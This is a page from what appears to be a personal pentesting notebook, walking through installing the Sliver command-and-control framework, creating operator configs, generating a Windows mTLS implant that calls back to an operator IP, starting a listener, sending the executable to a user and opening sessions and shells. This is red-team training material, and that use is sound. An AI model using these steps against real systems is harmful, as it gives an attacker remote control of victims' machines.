☕
Brinkles Pentesting Notebook
  • Introduction
    • My Journey to Pentesting
    • Twitter
    • Github
  • Certification Reviews
    • OSEP Review
    • CISSP Review
    • OSCP Review
    • RTJC Review
    • RTAC Review
    • CEH Review
    • CRTO Review
    • PNPT Review
    • eWPT Review
    • eJPTv1 Review
    • CCNP Security Review
    • CCNA Review
    • CompTIA Net +, A+ Review
  • C2 and Payloads
    • Sliver C2
    • Cobalt Strike
      • BOFs and Aggressor Scripts
        • Situational Awareness BOF
        • HOLLOW BOF
        • DLL_Version_Enumeration_BOF
        • InlineExecute-Assembly BOF
        • BOF.NET
        • C2-Tool-Collection BOFs
        • Inline-Execute-PE
      • Payloads
  • Tools
    • Internal Tools
      • BloodHound
      • Certi
      • Coercer
      • CrackMapExec
      • DCSync
      • DFSCoerce
      • DonPAPI
      • WMIEXEC
      • Kerberoasting
      • Lsassy
      • mitm6
      • Pcredz
      • PowerSploit
      • PrivExchange
      • Responder / RunFinger
      • Rubeus
      • Seatbelt
      • Seth
    • Web App Pentesting
      • Payload All The Things
        • Directory traversal
          • Deep Traversal
          • More Directory Traversal Payloads
        • SAML Injection
        • XXE - XML External Entity
        • XSS - Cross Site Scripting
        • XSLT Injection
        • XPATH injection
        • Upload Insecure Files
        • SQL injection
          • MSSQL Injection
          • MYSQL Injection
          • Oracle SQL Injection
          • PostgreSQL injection
          • SQLite Injection
        • Server Side Templates Injections
        • Server-Side Request Forgery
          • Payloads Included in Server-Side Request Forgery
        • Request Smuggling
        • OAuth
        • NoSQL injection
        • LDAP injection
        • Kubernetes
        • JSON Web Token
        • HTTP Parameter Pollution
        • GraphQL injection
        • CORS Misconfiguration
        • CRLF
        • Cross-Site Request Forgery
        • CSV Injection (Formula Injection)
        • File Inclusion
          • PHPINFOlfi.py
          • uploadlfi.py
  • Network Security
    • DMVPN GRE NHRP IPsec Profiles
    • Flex VPNs
    • GET VPN with Key Server
    • IKE Site to Site w/ IPSec
    • Point to Point GRE over IPSec
    • Remote Access VPN
    • Helpful Cisco Firewall CLI Commands
Powered by GitBook
On this page
  • Installation
  • Client
  • How to Use Sliver
  • Generating Payload steps
  • Resources

Sliver C2

PreviousC2 and PayloadsNextCobalt Strike

Last updated 2 years ago

Installation

  1. Download the server application

$ wget https://github.com/BishopFox/sliver/releases/download/v1.0.6-beta/sliver-server_linux.zip

^ Whichever is the new release

2. Unzip the file

$ unzip sliver-server_linux.zip

3. Install the required Libraries

$ sudo apt-get install mingw-w64 binutils-mingw-w64 g++-mingw-w64

4. Run the application

$ sudo ./sliver-server

5. Now we need to create a session for a player to connect, and then play the player database

$ new-player --operator brinkles --lhost 192.168.0.21

$ players

6. The file .cfg created will need to be installed in the clients host, so save it for later! Lets start the Multiplayer mode.

$ multiplayer

Client

Download the client application

$ wget https://github.com/BishopFox/sliver/releases/download/v1.0.6-beta/sliver-client_linux.zip

Unzip the application

$ unzip sliver-client_linux.zip

Install the required libraries

$ sudo apt-get install mingw-w64 binutils-mingw-w64 g++-mingw-w64

Try to run the application

$ sudo ./sliver-client

This is where you will need to copy that .cfg file. Copy the file into /home/kali/,sliver-client/configs

Try to run the application again

$ sudo ./sliver-client

We are logged into that player!

How to Use Sliver

$ help

Display players database:

$ players

To create new players accounts, this can only be run from the sliver server not the client

$ new-player --operator <username> --lhost <DNS or IP of the server>

Display the Sliver version

$ version

Generating Payload steps

We need to Generate an Implant (mtls, http, dns), this will generate a file saved at the location specified generate Generate a sliver binary. Lets do MTLS.

$ generate --mtls 192.168.0.21 --save ./file.exe --os Windows

Now, we can start the listener. Types of listeners can be http, https, dns, and mtls

$ mtls

$ jobs

Lets deliver the generated mtls exe and send to the user. Once the user executes teh payload, you will see this on your screen...

Lets show all active sessions

$ sessions -h

$ sessions

To kill the session, run...

$ session -k 1

To interact with the session, do...

$ sessions

$ session -i 7

Running help you can see all the available commands to run

Lets run some commands to test what you can do.

$ whoami

$ info

$ shell

Resources

https://vk9-sec.com/how-to-set-up-use-c2-sliver/

Page cover image